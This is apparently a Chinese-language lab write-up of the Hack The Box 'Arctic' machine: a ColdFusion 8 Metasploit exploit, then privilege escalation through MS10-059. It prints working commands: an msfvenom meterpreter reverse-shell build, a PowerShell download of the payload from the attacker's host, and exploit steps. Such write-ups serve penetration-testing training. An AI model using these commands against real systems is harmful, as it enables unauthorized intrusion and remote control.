HTB靶场记录之Arctic

 

本文是 i 春秋论坛作家「皮卡皮卡丘」表哥分享的技术文章,旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。

相关文章>>

HTB靶场记录之OpenAdmin

HTB靶场记录之Popcorn

HTB靶场记录之Europa

HTB靶场记录之Cronos

本文是 i 春秋论坛作家「皮卡皮卡丘」表哥分享的技术文章,公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。

HTB是一个靶机平台,里面包含多种系统类型的靶机,并且很多靶机非常贴近实战情景,是一个学习渗透测试不错的靶场。

HTB靶场记录之Cronos

 1、靶机介绍

这次的靶机是windows靶机。建议用MSF做前期的getshell,这样方便点。提权部分可能要手工编造PowerShell脚本传文件。

HTB靶场记录之Arctic

 

2、信息收集

还是先用nmap进行一波端口探测,终于遇到一个没80端口的了。

命令:nmap -A -sS -sV -v -p- 10.10.10.11

HTB靶场记录之Arctic

 

这里只能慢慢一个一个查,8500端口是唯一能正常访问的。

HTB靶场记录之Arctic

 那么逐一访问两个文件夹里面的内容一直到/CFIDE/administrator发现一个正常的Web登录页面。

HTB靶场记录之Arctic

 

3、利用MSF get shell

遇事不决问MSF,然而一搜就发现太多payload了。。。

HTB靶场记录之Arctic

 

那只能先进入MSF,找到一个扫描版本的payload。

这样可以缩短查找范围:

HTB靶场记录之Arctic

 

那么使用该payload,设置好参数以后run,成功得知版本为8。

HTB靶场记录之Arctic

 

缩短范围后,可以确定我们这次要用的payload是这个MSF自带的。

HTB靶场记录之Arctic

 

然而裂开了,第一次卡BUG卡在设置payload好久。请教一下大佬,结果要设置延迟时间。我们去到payload那里改,把5改为30。

HTB靶场记录之Arctic

 

此时重启波MSF使用
exploit/windows/http/coldfusion_fckeditorpayload。设置波参数成功得到一个普通用户shell。

命令:set RHOSTS 10.10.10.11

SetRPORT 8500

SetLHOST 10.10.14.5

SetLPORT 5555

run

HTB靶场记录之Arctic

 

顺便去到tolis/desktop得到flag。

HTB靶场记录之Arctic

 

4、添加shell

虽然我们拿到了shell,但提权对于我这种菜鸡来说还是太难了。需要用到MSF的local_exploit_suggester。我们需要在MSF下再拿一个shell运行它。所以需要先制作一个小exe的马

命令:msfVENOM
-pwindows/x64/meterpreter_reverse_tcp LHOST=10.10.14.5 LPORT=5555 -f exe>shell1.exe

HTB靶场记录之Arctic

 

然后打开我们的python3共享模式:

命令: python -m http.server 8082 此时在我们的靶机上要把exe给下载过来。

研究了一下传输命令,需要用到PowerShell,去网上找了个模板套了一下变成以下命令,成功把shell1.exe传过来了。

命令: PowerShell (new-object Net.WebClient).DownloadFile('
http://10.10.14.5:8082/shell1.exe','c:\Users\tolis\Desktop\shell1.exe')

HTB靶场记录之Arctic

 

同时启动MSF,用exploit/multi/handler payload,注意这里一定要设置payload为
windows/x64/meterpreter_reverse_tcp。这里在靶机上运行shell1.exe成功进入meterpreter。这时候我们同时有2个shell了。

HTB靶场记录之Arctic

 

5、利用辅助得到可利用的漏洞信息

关于windows靶机提权有2种方法第一种是利用MSF获得shell以后要使用到自带神器local_exploit_suggester。可以看到有3个可以利用的。据大佬说这3个都可以利用。

命令:ctrl+z Y 退出meterpreter回到background界面

usepost/multi/recon/local_exploit_suggester

setsession n

run

HTB靶场记录之Arctic

 

另外一种方法是有一个用神器windowexploitsuggester,比MSF扫出的多点。最后决定用MS10-059。

HTB靶场记录之Arctic

 

经过逐一筛选可确定是MS10-059有个payload在github页面
https://github.com/Re4son/Chimichurri

HTB靶场记录之Arctic

 

6、提权

大佬随便用MSF选那3个检测的洞就能搞定。而我各种线程注入,钻来钻去都失败了。重启靶机n次都不行。

只能用powershell脚本把我的Chimichurri.exe下载传过来。然后再慢慢弄。

这里演示如果我没用MSF添加shell时,如何方便传文件。

这是最终版powershell脚本,Windows上echo跟Linux echo一样同样可以写入文件里面。

这里解析一波,如果我说的不对请多多包容。

首先我们要创建一个WebClient对象(New-Object System.Net.WebClient)然后赋值給变量$webclient。

接着定义好我们要用python共享的端口和文件(注意一定要对大小写特别敏感,GitHub上下载下来的是Chimichurri.exe,而我这里写的是chimichurri.exe,我还疑惑了好久到底是哪出问题了)。然后指定接收后的文件改名为exploit.exe。而后面的WebClient.DownloadFile就是把将具有指定URL的文件下载到靶机上。最后开始用powershell.exe执行。这是菜鸟脚本而已。实在不行就在MSF添加shell以后上传也行。

HTB靶场记录之Arctic

 

然后在靶机上执行,记得提前开启波Nc反弹。

HTB靶场记录之Arctic

 

成功变为最高级权限。

HTB靶场记录之Arctic

 

posted @ 2021-12-30 15:07  i春秋  阅读(134)  评论(0编辑  收藏  举报